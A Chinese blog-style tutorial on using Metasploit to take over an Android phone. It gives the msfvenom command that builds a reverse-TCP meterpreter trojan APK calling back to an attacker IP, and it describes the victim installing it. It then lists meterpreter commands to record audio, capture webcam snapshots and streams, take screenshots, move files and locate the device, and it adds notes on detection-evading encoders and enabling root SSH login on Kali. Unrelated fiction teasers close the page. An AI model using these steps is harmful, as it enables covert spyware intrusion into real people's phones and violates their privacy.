Metasploit执行安卓端操控并获取一些信息

1.使用msf的msfveno模块生成安卓apk木马并制定攻击方IP与端口 ,存在temph目录下
image.png
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.17.190  lport=5555 R>/temph/a.apk
2.生成木马文件放到安卓端
image.png
3.执行监听,执行 当客户端执行点击apk文件 ,OK 上钩了
image.png
4.使用摄像头/录音

进行实时视频流


image.png

进行截屏


image.png

进行录音


image.png

等等一系列操作 列出如下指令:

record_mic 从默认麦克风录制音频 x 秒
record_mic 参数:
-h:显示帮助。 
-d :记录的秒数,默认为 1 秒 (默认的 1 秒听不到啥,设置高了又会报错,在 Kali linux 测得 13 为最优秒数) 
-F :wav 文件路径。默认为 HOME / [随机乱码名字] .wav 
-p :自动播放捕获的音频,默认为“true”。


webcam_chat 开始视频聊天 

webcam_list 列出网络摄像头 

webcam_snap 从指定的网络摄像头拍摄快照
webcam_snap 参数:
-h:显示帮助
-i :要使用的网络摄像头的索引号。
-p :JPEG 图像文件路径。默认为 HOME / [随机乱码名字]
-q :JPEG 图像质量,默认为“50”。 
-v :自动查看 JPEG 图像,默认为“true”

webcam_stream 从指定的网络摄像头播放视频流
4.文件上传下载

手机图片存的位置


image.png

5.图片文件搜索

image.png

下载
meterpreter > download desktop.ini
上传
meterpreter > upload /root/Downloads/1.jpeg /storage/emulated/0/DCIM/Camera

5.获取位置

image.png
渗透攻击(exploit) : 缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。
攻击载荷(payload):攻击载何是我们期望目标系统在被渗透攻击后而执行的代码
辅助模块  (auxiliary):主要包含渗透测试中一些辅助性的脚本,这些脚本功能有扫描,嗅探,破解,注入等
编码模块  (Encoders):各种编码工具 用于躲过入侵检测和过滤系统。
后续攻击模块 (Post) : 这个目录里放着msf 的exploits执行成功后,向目标机发送的一些功能性指令比如:提权,获取hash等。
kail Windows10 远程连接解决办法

第一步:开启kail 远程ssh,开启办法如下:
1、配置SSH参数
修改sshd_config文件,命令为:vi /etc/ssh/sshd_config
将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes
将PermitRootLogin without-password修改为PermitRootLogin yes
然后,保存,退出vi

第二步:启动SSH服务
命令为:
/etc/init.d/ssh start
或者
service ssh start
查看SSH服务状态是否正常运行,命令为:
/etc/init.d/ssh status
或者
service ssh status
第三步:设置系统自动启动SSH服务
update-rc.d ssh enable //系统自动启动SSH服务
update-rc.d ssh disabled // 关闭系统自动启动SSH服务

防火墙相关,若没进行安装 apt-get install ufw
image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 219,589评论 6 508
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,615评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 165,933评论 0 356
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,976评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,999评论 6 393
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,775评论 1 307
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,474评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,359评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,854评论 1 317
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,007评论 3 338
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,146评论 1 351
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,826评论 5 346
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,484评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,029评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,153评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,420评论 3 373
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,107评论 2 356